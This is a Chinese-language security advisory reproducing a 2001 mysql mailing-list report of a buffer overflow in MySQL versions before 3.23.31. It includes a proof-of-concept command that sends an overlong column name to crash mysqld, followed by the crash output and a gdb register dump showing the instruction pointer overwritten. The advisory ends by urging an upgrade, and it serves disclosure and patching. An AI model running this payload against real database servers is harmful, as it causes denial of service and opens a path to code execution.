所有小于 3.23.31 版本的 mysql 都存在一个缓冲溢出漏洞导致mysql 崩溃。使攻击者获得 mysqld 权限，而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 mysql 邮件列表的信件摘要。
==================================================
漏洞是由jo?o gouveia 于1月12日发现的：
步骤：
在第一个终端上启动 mysql：
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入：
jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf(ax130)’`’.b’
enter password:
(没有反应？按^c退出)
在第一台终端上会显示：
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 segmentation fault
nohup
$ledir/mysqld --basedir=$my_basedir_version --datadir=$datadir --skip-lockin
g $@ >>$err_log 2>&1>
number of processes running now: 0
mysqld restarted on fri jan 12 07:10:54 wet 2001
mysqld daemon ended
使用 gdb 显示结果如下：
(gdb) run
starting program: /usr/sbin/mysqld
[new thread 16897 (manager thread)]
[new thread 16891 (initial thread)]
[new thread 16898]
/usr/sbin/mysqld: ready for connections
[new thread 16916]
[switching to thread 16916]
program received signal sigsegv, segmentation fault.
0x41414141 in ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以，各位如果还没有把数据库升级到最新版本，请赶快行动。